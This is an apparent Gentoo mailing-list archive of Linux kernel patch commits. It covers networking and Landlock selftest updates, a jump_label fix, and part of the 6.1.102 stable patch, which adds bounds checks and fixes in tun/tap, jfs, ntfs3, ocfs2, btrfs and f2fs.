++++ b/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh
+@@ -11,7 +11,7 @@ ALL_TESTS="single_mask_test identical_filters_test two_masks_test \
+ 	multiple_masks_test ctcam_edge_cases_test delta_simple_test \
+ 	delta_two_masks_one_key_test delta_simple_rehash_test \
+ 	bloom_simple_test bloom_complex_test bloom_delta_test \
+-	max_erp_entries_test max_group_size_test"
++	max_erp_entries_test max_group_size_test collision_test"
+ NUM_NETIFS=2
+ source $lib_dir/lib.sh
+ source $lib_dir/tc_common.sh
+@@ -457,7 +457,7 @@ delta_two_masks_one_key_test()
+ {
+ 	# If 2 keys are the same and only differ in mask in a way that
+ 	# they belong under the same ERP (second is delta of the first),
+-	# there should be no C-TCAM spill.
++	# there should be C-TCAM spill.
+ 
+ 	RET=0
+ 
+@@ -474,8 +474,8 @@ delta_two_masks_one_key_test()
+ 	tp_record "mlxsw:*" "tc filter add dev $h2 ingress protocol ip \
+ 		   pref 2 handle 102 flower $tcflags dst_ip 192.0.2.2 \
+ 		   action drop"
+-	tp_check_hits "mlxsw:mlxsw_sp_acl_atcam_entry_add_ctcam_spill" 0
+-	check_err $? "incorrect C-TCAM spill while inserting the second rule"
++	tp_check_hits "mlxsw:mlxsw_sp_acl_atcam_entry_add_ctcam_spill" 1
++	check_err $? "C-TCAM spill did not happen while inserting the second rule"
+ 
+ 	$MZ $h1 -c 1 -p 64 -a $h1mac -b $h2mac -A 192.0.2.1 -B 192.0.2.2 \
+ 		-t ip -q
+@@ -1087,6 +1087,53 @@ max_group_size_test()
+ 	log_test "max ACL group size test ($tcflags). max size $max_size"
+ }
+ 
++collision_test()
++{
++	# Filters cannot share an eRP if in the common unmasked part (i.e.,
++	# without the delta bits) they have the same values. If the driver does
++	# not prevent such configuration (by spilling into the C-TCAM), then
++	# multiple entries will be present in the device with the same key,
++	# leading to collisions and a reduced scale.
++	#
++	# Create such a scenario and make sure all the filters are successfully
++	# added.
++
++	RET=0
++
++	local ret
++
++	if [[ "$tcflags" != "skip_sw" ]]; then
++		return 0;
++	fi
++
++	# Add a single dst_ip/24 filter and multiple dst_ip/32 filters that all
++	# have the same values in the common unmasked part (dst_ip/24).
++
++	tc filter add dev $h2 ingress pref 1 proto ipv4 handle 101 \
++		flower $tcflags dst_ip 198.51.100.0/24 \
++		action drop
++
++	for i in {0..255}; do
++		tc filter add dev $h2 ingress pref 2 proto ipv4 \
++			handle $((102 + i)) \
++			flower $tcflags dst_ip 198.51.100.${i}/32 \
++			action drop
++		ret=$?
++		[[ $ret -ne 0 ]] && break
++	done
++
++	check_err $ret "failed to add all the filters"
++
++	for i in {255..0}; do
++		tc filter del dev $h2 ingress pref 2 proto ipv4 \
++			handle $((102 + i)) flower
++	done
++
++	tc filter del dev $h2 ingress pref 1 proto ipv4 handle 101 flower
++
++	log_test "collision test ($tcflags)"
++}
++
+ setup_prepare()
+ {
+ 	h1=${NETIFS[p1]}
+diff --git a/tools/testing/selftests/landlock/base_test.c b/tools/testing/selftests/landlock/base_test.c
+index da92908178667..e438317461465 100644
+--- a/tools/testing/selftests/landlock/base_test.c
++++ b/tools/testing/selftests/landlock/base_test.c
+@@ -9,6 +9,7 @@
+ #define _GNU_SOURCE
+ #include <errno.h>
+ #include <fcntl.h>
++#include <linux/keyctl.h>
+ #include <linux/landlock.h>
+ #include <string.h>
+ #include <sys/prctl.h>
+@@ -356,4 +357,77 @@ TEST(ruleset_fd_transfer)
+ 	ASSERT_EQ(EXIT_SUCCESS, WEXITSTATUS(status));
+ }
+ 
++TEST(cred_transfer)
++{
++	struct landlock_ruleset_attr ruleset_attr = {
++		.handled_access_fs = LANDLOCK_ACCESS_FS_READ_DIR,
++	};
++	int ruleset_fd, dir_fd;
++	pid_t child;
++	int status;
++
++	drop_caps(_metadata);
++
++	dir_fd = open("/", O_RDONLY | O_DIRECTORY | O_CLOEXEC);
++	EXPECT_LE(0, dir_fd);
++	EXPECT_EQ(0, close(dir_fd));
++
++	/* Denies opening directories. */
++	ruleset_fd =
++		landlock_create_ruleset(&ruleset_attr, sizeof(ruleset_attr), 0);
++	ASSERT_LE(0, ruleset_fd);
++	EXPECT_EQ(0, prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0));
++	ASSERT_EQ(0, landlock_restrict_self(ruleset_fd, 0));
++	EXPECT_EQ(0, close(ruleset_fd));
++
++	/* Checks ruleset enforcement. */
++	EXPECT_EQ(-1, open("/", O_RDONLY | O_DIRECTORY | O_CLOEXEC));
++	EXPECT_EQ(EACCES, errno);
++
++	/* Needed for KEYCTL_SESSION_TO_PARENT permission checks */
++	EXPECT_NE(-1, syscall(__NR_keyctl, KEYCTL_JOIN_SESSION_KEYRING, NULL, 0,
++			      0, 0))
++	{
++		TH_LOG("Failed to join session keyring: %s", strerror(errno));
++	}
++
++	child = fork();
++	ASSERT_LE(0, child);
++	if (child == 0) {
++		/* Checks ruleset enforcement. */
++		EXPECT_EQ(-1, open("/", O_RDONLY | O_DIRECTORY | O_CLOEXEC));
++		EXPECT_EQ(EACCES, errno);
++
++		/*
++		 * KEYCTL_SESSION_TO_PARENT is a no-op unless we have a
++		 * different session keyring in the child, so make that happen.
++		 */
++		EXPECT_NE(-1, syscall(__NR_keyctl, KEYCTL_JOIN_SESSION_KEYRING,
++				      NULL, 0, 0, 0));
++
++		/*
++		 * KEYCTL_SESSION_TO_PARENT installs credentials on the parent
++		 * that never go through the cred_prepare hook, this path uses
++		 * cred_transfer instead.
++		 */
++		EXPECT_EQ(0, syscall(__NR_keyctl, KEYCTL_SESSION_TO_PARENT, 0,
++				     0, 0, 0));
++
++		/* Re-checks ruleset enforcement. */
++		EXPECT_EQ(-1, open("/", O_RDONLY | O_DIRECTORY | O_CLOEXEC));
++		EXPECT_EQ(EACCES, errno);
++
++		_exit(_metadata->passed ? EXIT_SUCCESS : EXIT_FAILURE);
++		return;
++	}
++
++	EXPECT_EQ(child, waitpid(child, &status, 0));
++	EXPECT_EQ(1, WIFEXITED(status));
++	EXPECT_EQ(EXIT_SUCCESS, WEXITSTATUS(status));
++
++	/* Re-checks ruleset enforcement. */
++	EXPECT_EQ(-1, open("/", O_RDONLY | O_DIRECTORY | O_CLOEXEC));
++	EXPECT_EQ(EACCES, errno);
++}
++
+ TEST_HARNESS_MAIN
+diff --git a/tools/testing/selftests/landlock/config b/tools/testing/selftests/landlock/config
+index 0f0a65287bacf..177f4878bdf33 100644
+--- a/tools/testing/selftests/landlock/config
++++ b/tools/testing/selftests/landlock/config
+@@ -1,7 +1,8 @@
++CONFIG_KEYS=y
+ CONFIG_OVERLAY_FS=y
++CONFIG_SECURITY=y
+ CONFIG_SECURITY_LANDLOCK=y
+ CONFIG_SECURITY_PATH=y
+-CONFIG_SECURITY=y
+ CONFIG_SHMEM=y
+-CONFIG_TMPFS_XATTR=y
+ CONFIG_TMPFS=y
++CONFIG_TMPFS_XATTR=y
+diff --git a/tools/testing/selftests/net/fib_tests.sh b/tools/testing/selftests/net/fib_tests.sh
+index e5db2a2a67df9..26f30c6fa0f29 100755
+--- a/tools/testing/selftests/net/fib_tests.sh
++++ b/tools/testing/selftests/net/fib_tests.sh
+@@ -1485,53 +1485,53 @@ ipv4_rt_dsfield()
+ 
+ 	# DSCP 0x10 should match the specific route, no matter the ECN bits
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x10 | \
+-		grep -q "via 172.16.103.2"
++		grep -q "172.16.102.0/24 tos 0x10 via 172.16.103.2"
+ 	log_test $? 0 "IPv4 route with DSCP and ECN:Not-ECT"
+ 
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x11 | \
+-		grep -q "via 172.16.103.2"
++		grep -q "172.16.102.0/24 tos 0x10 via 172.16.103.2"
+ 	log_test $? 0 "IPv4 route with DSCP and ECN:ECT(1)"
+ 
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x12 | \
+-		grep -q "via 172.16.103.2"
++		grep -q "172.16.102.0/24 tos 0x10 via 172.16.103.2"
+ 	log_test $? 0 "IPv4 route with DSCP and ECN:ECT(0)"
+ 
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x13 | \
+-		grep -q "via 172.16.103.2"
++		grep -q "172.16.102.0/24 tos 0x10 via 172.16.103.2"
+ 	log_test $? 0 "IPv4 route with DSCP and ECN:CE"
+ 
+ 	# Unknown DSCP should match the generic route, no matter the ECN bits
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x14 | \
+-		grep -q "via 172.16.101.2"
++		grep -q "172.16.102.0/24 via 172.16.101.2"
+ 	log_test $? 0 "IPv4 route with unknown DSCP and ECN:Not-ECT"
+ 
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x15 | \
+-		grep -q "via 172.16.101.2"
++		grep -q "172.16.102.0/24 via 172.16.101.2"
+ 	log_test $? 0 "IPv4 route with unknown DSCP and ECN:ECT(1)"
+ 
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x16 | \
+-		grep -q "via 172.16.101.2"
++		grep -q "172.16.102.0/24 via 172.16.101.2"
+ 	log_test $? 0 "IPv4 route with unknown DSCP and ECN:ECT(0)"
+ 
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x17 | \
+-		grep -q "via 172.16.101.2"
++		grep -q "172.16.102.0/24 via 172.16.101.2"
+ 	log_test $? 0 "IPv4 route with unknown DSCP and ECN:CE"
+ 
+ 	# Null DSCP should match the generic route, no matter the ECN bits
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x00 | \
+-		grep -q "via 172.16.101.2"
++		grep -q "172.16.102.0/24 via 172.16.101.2"
+ 	log_test $? 0 "IPv4 route with no DSCP and ECN:Not-ECT"
+ 
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x01 | \
+-		grep -q "via 172.16.101.2"
++		grep -q "172.16.102.0/24 via 172.16.101.2"
+ 	log_test $? 0 "IPv4 route with no DSCP and ECN:ECT(1)"
+ 
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x02 | \
+-		grep -q "via 172.16.101.2"
++		grep -q "172.16.102.0/24 via 172.16.101.2"
+ 	log_test $? 0 "IPv4 route with no DSCP and ECN:ECT(0)"
+ 
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x03 | \
+-		grep -q "via 172.16.101.2"
++		grep -q "172.16.102.0/24 via 172.16.101.2"
+ 	log_test $? 0 "IPv4 route with no DSCP and ECN:CE"
+ }
+ 
+diff --git a/tools/testing/selftests/net/forwarding/devlink_lib.sh b/tools/testing/selftests/net/forwarding/devlink_lib.sh
+index 601990c6881bf..4c555fab9e755 100644
+--- a/tools/testing/selftests/net/forwarding/devlink_lib.sh
++++ b/tools/testing/selftests/net/forwarding/devlink_lib.sh
+@@ -122,6 +122,8 @@ devlink_reload()
+ 	still_pending=$(devlink resource show "$DEVLINK_DEV" | \
+ 			grep -c "size_new")
+ 	check_err $still_pending "Failed reload - There are still unset sizes"
++
++	udevadm settle
+ }
+ 
+ declare -A DEVLINK_ORIG
+diff --git a/tools/testing/selftests/sigaltstack/current_stack_pointer.h b/tools/testing/selftests/sigaltstack/current_stack_pointer.h
+index ea9bdf3a90b16..09da8f1011ce4 100644
+--- a/tools/testing/selftests/sigaltstack/current_stack_pointer.h
++++ b/tools/testing/selftests/sigaltstack/current_stack_pointer.h
+@@ -8,7 +8,7 @@ register unsigned long sp asm("sp");
+ register unsigned long sp asm("esp");
+ #elif __loongarch64
+ register unsigned long sp asm("$sp");
+-#elif __ppc__
++#elif __powerpc__
+ register unsigned long sp asm("r1");
+ #elif __s390x__
+ register unsigned long sp asm("%15");

diff --git a/2960_jump-label-fix.patch b/2960_jump-label-fix.patch
new file mode 100644
index 00000000..1a5fdf7a
--- /dev/null
+++ b/2960_jump-label-fix.patch
@@ -0,0 +1,57 @@
+From 224fa3552029a3d14bec7acf72ded8171d551b88 Mon Sep 17 00:00:00 2001
+From: Peter Zijlstra <peterz@infradead.org>
+Date: Wed, 31 Jul 2024 12:43:21 +0200
+Subject: jump_label: Fix the fix, brown paper bags galore
+
+Per the example of:
+
+  !atomic_cmpxchg(&key->enabled, 0, 1)
+
+the inverse was written as:
+
+  atomic_cmpxchg(&key->enabled, 1, 0)
+
+except of course, that while !old is only true for old == 0, old is
+true for everything except old == 0.
+
+Fix it to read:
+
+  atomic_cmpxchg(&key->enabled, 1, 0) == 1
+
+such that only the 1->0 transition returns true and goes on to disable
+the keys.
+
+Fixes: 83ab38ef0a0b ("jump_label: Fix concurrency issues in static_key_slow_dec()")
+Reported-by: Darrick J. Wong <djwong@kernel.org>
+Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
+Tested-by: Darrick J. Wong <djwong@kernel.org>
+Link: https://lkml.kernel.org/r/20240731105557.GY33588@noisy.programming.kicks-ass.net
+---
+ kernel/jump_label.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/kernel/jump_label.c b/kernel/jump_label.c
+index 4ad5ed8adf9691..6dc76b590703ed 100644
+--- a/kernel/jump_label.c
++++ b/kernel/jump_label.c
+@@ -236,7 +236,7 @@ void static_key_disable_cpuslocked(struct static_key *key)
+ 	}
+ 
+ 	jump_label_lock();
+-	if (atomic_cmpxchg(&key->enabled, 1, 0))
++	if (atomic_cmpxchg(&key->enabled, 1, 0) == 1)
+ 		jump_label_update(key);
+ 	jump_label_unlock();
+ }
+@@ -289,7 +289,7 @@ static void __static_key_slow_dec_cpuslocked(struct static_key *key)
+ 		return;
+ 
+ 	guard(mutex)(&jump_label_mutex);
+-	if (atomic_cmpxchg(&key->enabled, 1, 0))
++	if (atomic_cmpxchg(&key->enabled, 1, 0) == 1)
+ 		jump_label_update(key);
+ 	else
+ 		WARN_ON_ONCE(!static_key_slow_try_dec(key));
+-- 
+cgit 1.2.3-korg
+


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-07-27 13:47 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-07-27 13:47 UTC (permalink / raw
  To: gentoo-commits

commit:     31261c1d5923f7915b28bbf7fcedc686dae45266
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Jul 27 13:47:18 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Jul 27 13:47:18 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=31261c1d

Linux patch 6.1.102

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |   4 +
 1101_linux-6.1.102.patch | 433 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 437 insertions(+)

diff --git a/0000_README b/0000_README
index ad9ca363..2afa5cc7 100644
--- a/0000_README
+++ b/0000_README
@@ -447,6 +447,10 @@ Patch:  1100_linux-6.1.101.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.101
 
+Patch:  1101_linux-6.1.102.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.102
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1101_linux-6.1.102.patch b/1101_linux-6.1.102.patch
new file mode 100644
index 00000000..5a6129d9
--- /dev/null
+++ b/1101_linux-6.1.102.patch
@@ -0,0 +1,433 @@
+diff --git a/Makefile b/Makefile
+index c2dc43c862dbf..00ec5357bc78d 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 101
++SUBLEVEL = 102
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/boot/dts/qcom/ipq6018.dtsi b/arch/arm64/boot/dts/qcom/ipq6018.dtsi
+index 1533c61cb106c..3a943912b090b 100644
+--- a/arch/arm64/boot/dts/qcom/ipq6018.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq6018.dtsi
+@@ -760,6 +760,7 @@ dwc_0: usb@8a00000 {
+ 				clocks = <&xo>;
+ 				clock-names = "ref";
+ 				tx-fifo-resize;
++				snps,parkmode-disable-ss-quirk;
+ 				snps,is-utmi-l1-suspend;
+ 				snps,hird-threshold = /bits/ 8 <0x0>;
+ 				snps,dis_u2_susphy_quirk;
+diff --git a/arch/arm64/boot/dts/qcom/msm8996.dtsi b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+index 789121171a110..986a5b5c05e48 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+@@ -3004,6 +3004,7 @@ usb3_dwc3: usb@6a00000 {
+ 				snps,dis_u2_susphy_quirk;
+ 				snps,dis_enblslpm_quirk;
+ 				snps,is-utmi-l1-suspend;
++				snps,parkmode-disable-ss-quirk;
+ 				tx-fifo-resize;
+ 			};
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sdm630.dtsi b/arch/arm64/boot/dts/qcom/sdm630.dtsi
+index 2430549265d3f..75ddebebb8fc1 100644
+--- a/arch/arm64/boot/dts/qcom/sdm630.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm630.dtsi
+@@ -1243,6 +1243,7 @@ usb3_dwc3: usb@a800000 {
+ 				interrupts = <GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>;
+ 				snps,dis_u2_susphy_quirk;
+ 				snps,dis_enblslpm_quirk;
++				snps,parkmode-disable-ss-quirk;
+ 
+ 				/*
+ 				 * SDM630 technically supports USB3 but I
+diff --git a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+index 68cdb6682776a..b19353412d8a1 100644
+--- a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+@@ -2045,7 +2045,7 @@ static int sdma_v4_0_process_trap_irq(struct amdgpu_device *adev,
+ 				      struct amdgpu_irq_src *source,
+ 				      struct amdgpu_iv_entry *entry)
+ {
+-	uint32_t instance;
++	int instance;
+ 
+ 	DRM_DEBUG("IH: SDMA trap\n");
+ 	instance = sdma_v4_0_irq_id_to_seq(entry->client_id);
+diff --git a/drivers/net/tap.c b/drivers/net/tap.c
+index 8c010857e6d70..f8e7b163810de 100644
+--- a/drivers/net/tap.c
++++ b/drivers/net/tap.c
+@@ -1156,6 +1156,11 @@ static int tap_get_user_xdp(struct tap_queue *q, struct xdp_buff *xdp)
+ 	struct sk_buff *skb;
+ 	int err, depth;
+ 
++	if (unlikely(xdp->data_end - xdp->data < ETH_HLEN)) {
++		err = -EINVAL;
++		goto err;
++	}
++
+ 	if (q->flags & IFF_VNET_HDR)
+ 		vnet_hdr_len = READ_ONCE(q->vnet_hdr_sz);
+ 
+diff --git a/drivers/net/tun.c b/drivers/net/tun.c
+index 4af1ba5d074c0..ea98d93138c12 100644
+--- a/drivers/net/tun.c
++++ b/drivers/net/tun.c
+@@ -2448,6 +2448,9 @@ static int tun_xdp_one(struct tun_struct *tun,
+ 	bool skb_xdp = false;
+ 	struct page *page;
+ 
++	if (unlikely(datasize < ETH_HLEN))
++		return -EINVAL;
++
+ 	xdp_prog = rcu_dereference(tun->xdp_prog);
+ 	if (xdp_prog) {
+ 		if (gso->gso_type) {
+diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
+index a7853a3a57190..604241e6e2c1e 100644
+--- a/fs/btrfs/transaction.c
++++ b/fs/btrfs/transaction.c
+@@ -1701,7 +1701,10 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
+ 	 * insert the directory item
+ 	 */
+ 	ret = btrfs_set_inode_index(BTRFS_I(parent_inode), &index);
+-	BUG_ON(ret); /* -ENOMEM */
++	if (ret) {
++		btrfs_abort_transaction(trans, ret);
++		goto fail;
++	}
+ 
+ 	/* check if there is a file/dir which has the same name. */
+ 	dir_item = btrfs_lookup_dir_item(NULL, parent_root, path,
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index 6bd8c231069ad..2d586a6bfe5fa 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -2824,15 +2824,26 @@ static int f2fs_quota_on(struct super_block *sb, int type, int format_id,
+ 		return -EBUSY;
+ 	}
+ 
++	if (path->dentry->d_sb != sb)
++		return -EXDEV;
++
+ 	err = f2fs_quota_sync(sb, type);
+ 	if (err)
+ 		return err;
+ 
+-	err = dquot_quota_on(sb, type, format_id, path);
++	inode = d_inode(path->dentry);
++
++	err = filemap_fdatawrite(inode->i_mapping);
+ 	if (err)
+ 		return err;
+ 
+-	inode = d_inode(path->dentry);
++	err = filemap_fdatawait(inode->i_mapping);
++	if (err)
++		return err;
++
++	err = dquot_quota_on(sb, type, format_id, path);
++	if (err)
++		return err;
+ 
+ 	inode_lock(inode);
+ 	F2FS_I(inode)->i_flags |= F2FS_NOATIME_FL | F2FS_IMMUTABLE_FL;
+diff --git a/fs/jfs/xattr.c b/fs/jfs/xattr.c
+index 07df16ce80064..8ef8dfc3c1944 100644
+--- a/fs/jfs/xattr.c
++++ b/fs/jfs/xattr.c
+@@ -797,7 +797,7 @@ ssize_t __jfs_getxattr(struct inode *inode, const char *name, void *data,
+ 		       size_t buf_size)
+ {
+ 	struct jfs_ea_list *ealist;
+-	struct jfs_ea *ea;
++	struct jfs_ea *ea, *ealist_end;
+ 	struct ea_buffer ea_buf;
+ 	int xattr_size;
+ 	ssize_t size;
+@@ -817,9 +817,16 @@ ssize_t __jfs_getxattr(struct inode *inode, const char *name, void *data,
+ 		goto not_found;
+ 
+ 	ealist = (struct jfs_ea_list *) ea_buf.xattr;
++	ealist_end = END_EALIST(ealist);
+ 
+ 	/* Find the named attribute */
+-	for (ea = FIRST_EA(ealist); ea < END_EALIST(ealist); ea = NEXT_EA(ea))
++	for (ea = FIRST_EA(ealist); ea < ealist_end; ea = NEXT_EA(ea)) {
++		if (unlikely(ea + 1 > ealist_end) ||
++		    unlikely(NEXT_EA(ea) > ealist_end)) {
++			size = -EUCLEAN;
++			goto release;
++		}
++
+ 		if ((namelen == ea->namelen) &&
+ 		    memcmp(name, ea->name, namelen) == 0) {
+ 			/* Found it */
+@@ -834,6 +841,7 @@ ssize_t __jfs_getxattr(struct inode *inode, const char *name, void *data,
+ 			memcpy(data, value, size);
+ 			goto release;
+ 		}
++	}
+       not_found:
+ 	size = -ENODATA;
+       release:
+@@ -861,7 +869,7 @@ ssize_t jfs_listxattr(struct dentry * dentry, char *data, size_t buf_size)
+ 	ssize_t size = 0;
+ 	int xattr_size;
+ 	struct jfs_ea_list *ealist;
+-	struct jfs_ea *ea;
++	struct jfs_ea *ea, *ealist_end;
+ 	struct ea_buffer ea_buf;
+ 
+ 	down_read(&JFS_IP(inode)->xattr_sem);
+@@ -876,9 +884,16 @@ ssize_t jfs_listxattr(struct dentry * dentry, char *data, size_t buf_size)
+ 		goto release;
+ 
+ 	ealist = (struct jfs_ea_list *) ea_buf.xattr;
++	ealist_end = END_EALIST(ealist);
+ 
+ 	/* compute required size of list */
+-	for (ea = FIRST_EA(ealist); ea < END_EALIST(ealist); ea = NEXT_EA(ea)) {
++	for (ea = FIRST_EA(ealist); ea < ealist_end; ea = NEXT_EA(ea)) {
++		if (unlikely(ea + 1 > ealist_end) ||
++		    unlikely(NEXT_EA(ea) > ealist_end)) {
++			size = -EUCLEAN;
++			goto release;
++		}
++
+ 		if (can_list(ea))
+ 			size += name_size(ea) + 1;
+ 	}
+diff --git a/fs/locks.c b/fs/locks.c
+index 5aa574fec3026..9495a55f6347d 100644
+--- a/fs/locks.c
++++ b/fs/locks.c
+@@ -2516,8 +2516,9 @@ int fcntl_setlk64(unsigned int fd, struct file *filp, unsigned int cmd,
+ 	error = do_lock_file_wait(filp, cmd, file_lock);
+ 
+ 	/*
+-	 * Attempt to detect a close/fcntl race and recover by releasing the
+-	 * lock that was just acquired. There is no need to do that when we're
++	 * Detect close/fcntl races and recover by zapping all POSIX locks
++	 * associated with this file and our files_struct, just like on
++	 * filp_flush(). There is no need to do that when we're
+ 	 * unlocking though, or for OFD locks.
+ 	 */
+ 	if (!error && file_lock->fl_type != F_UNLCK &&
+@@ -2532,9 +2533,7 @@ int fcntl_setlk64(unsigned int fd, struct file *filp, unsigned int cmd,
+ 		f = files_lookup_fd_locked(files, fd);
+ 		spin_unlock(&files->file_lock);
+ 		if (f != filp) {
+-			file_lock->fl_type = F_UNLCK;
+-			error = do_lock_file_wait(filp, cmd, file_lock);
+-			WARN_ON_ONCE(error);
++			locks_remove_posix(filp, files);
+ 			error = -EBADF;
+ 		}
+ 	}
+diff --git a/fs/ntfs3/fslog.c b/fs/ntfs3/fslog.c
+index a2d5b2a94d854..6d0d9b1c3b2e7 100644
+--- a/fs/ntfs3/fslog.c
++++ b/fs/ntfs3/fslog.c
+@@ -724,7 +724,8 @@ static bool check_rstbl(const struct RESTART_TABLE *rt, size_t bytes)
+ 
+ 	if (!rsize || rsize > bytes ||
+ 	    rsize + sizeof(struct RESTART_TABLE) > bytes || bytes < ts ||
+-	    le16_to_cpu(rt->total) > ne || ff > ts || lf > ts ||
++	    le16_to_cpu(rt->total) > ne ||
++			ff > ts - sizeof(__le32) || lf > ts - sizeof(__le32) ||
+ 	    (ff && ff < sizeof(struct RESTART_TABLE)) ||
+ 	    (lf && lf < sizeof(struct RESTART_TABLE))) {
+ 		return false;
+@@ -754,6 +755,9 @@ static bool check_rstbl(const struct RESTART_TABLE *rt, size_t bytes)
+ 			return false;
+ 
+ 		off = le32_to_cpu(*(__le32 *)Add2Ptr(rt, off));
++
++		if (off > ts - sizeof(__le32))
++			return false;
+ 	}
+ 
+ 	return true;
+diff --git a/fs/ocfs2/dir.c b/fs/ocfs2/dir.c
+index 694471fc46b82..d27e15b54be4b 100644
+--- a/fs/ocfs2/dir.c
++++ b/fs/ocfs2/dir.c
+@@ -294,13 +294,16 @@ static void ocfs2_dx_dir_name_hash(struct inode *dir, const char *name, int len,
+  * bh passed here can be an inode block or a dir data block, depending
+  * on the inode inline data flag.
+  */
+-static int ocfs2_check_dir_entry(struct inode * dir,
+-				 struct ocfs2_dir_entry * de,
+-				 struct buffer_head * bh,
++static int ocfs2_check_dir_entry(struct inode *dir,
++				 struct ocfs2_dir_entry *de,
++				 struct buffer_head *bh,
++				 char *buf,
++				 unsigned int size,
+ 				 unsigned long offset)
+ {
+ 	const char *error_msg = NULL;
+ 	const int rlen = le16_to_cpu(de->rec_len);
++	const unsigned long next_offset = ((char *) de - buf) + rlen;
+ 
+ 	if (unlikely(rlen < OCFS2_DIR_REC_LEN(1)))
+ 		error_msg = "rec_len is smaller than minimal";
+@@ -308,9 +311,11 @@ static int ocfs2_check_dir_entry(struct inode * dir,
+ 		error_msg = "rec_len % 4 != 0";
+ 	else if (unlikely(rlen < OCFS2_DIR_REC_LEN(de->name_len)))
+ 		error_msg = "rec_len is too small for name_len";
+-	else if (unlikely(
+-		 ((char *) de - bh->b_data) + rlen > dir->i_sb->s_blocksize))
+-		error_msg = "directory entry across blocks";
++	else if (unlikely(next_offset > size))
++		error_msg = "directory entry overrun";
++	else if (unlikely(next_offset > size - OCFS2_DIR_REC_LEN(1)) &&
++		 next_offset != size)
++		error_msg = "directory entry too close to end";
+ 
+ 	if (unlikely(error_msg != NULL))
+ 		mlog(ML_ERROR, "bad entry in directory #%llu: %s - "
+@@ -352,16 +357,17 @@ static inline int ocfs2_search_dirblock(struct buffer_head *bh,
+ 	de_buf = first_de;
+ 	dlimit = de_buf + bytes;
+ 
+-	while (de_buf < dlimit) {
++	while (de_buf < dlimit - OCFS2_DIR_MEMBER_LEN) {
+ 		/* this code is executed quadratically often */
+ 		/* do minimal checking `by hand' */
+ 
+ 		de = (struct ocfs2_dir_entry *) de_buf;
+ 
+-		if (de_buf + namelen <= dlimit &&
++		if (de->name + namelen <= dlimit &&
+ 		    ocfs2_match(namelen, name, de)) {
+ 			/* found a match - just to be sure, do a full check */
+-			if (!ocfs2_check_dir_entry(dir, de, bh, offset)) {
++			if (!ocfs2_check_dir_entry(dir, de, bh, first_de,
++						   bytes, offset)) {
+ 				ret = -1;
+ 				goto bail;
+ 			}
+@@ -1138,7 +1144,7 @@ static int __ocfs2_delete_entry(handle_t *handle, struct inode *dir,
+ 	pde = NULL;
+ 	de = (struct ocfs2_dir_entry *) first_de;
+ 	while (i < bytes) {
+-		if (!ocfs2_check_dir_entry(dir, de, bh, i)) {
++		if (!ocfs2_check_dir_entry(dir, de, bh, first_de, bytes, i)) {
+ 			status = -EIO;
+ 			mlog_errno(status);
+ 			goto bail;
+@@ -1638,7 +1644,8 @@ int __ocfs2_add_entry(handle_t *handle,
+ 		/* These checks should've already been passed by the
+ 		 * prepare function, but I guess we can leave them
+ 		 * here anyway. */
+-		if (!ocfs2_check_dir_entry(dir, de, insert_bh, offset)) {
++		if (!ocfs2_check_dir_entry(dir, de, insert_bh, data_start,
++					   size, offset)) {
+ 			retval = -ENOENT;
+ 			goto bail;
+ 		}
+@@ -1776,7 +1783,8 @@ static int ocfs2_dir_foreach_blk_id(struct inode *inode,
+ 		}
+ 
+ 		de = (struct ocfs2_dir_entry *) (data->id_data + ctx->pos);
+-		if (!ocfs2_check_dir_entry(inode, de, di_bh, ctx->pos)) {
++		if (!ocfs2_check_dir_entry(inode, de, di_bh, (char *)data->id_data,
++					   i_size_read(inode), ctx->pos)) {
+ 			/* On error, skip the f_pos to the end. */
+ 			ctx->pos = i_size_read(inode);
+ 			break;
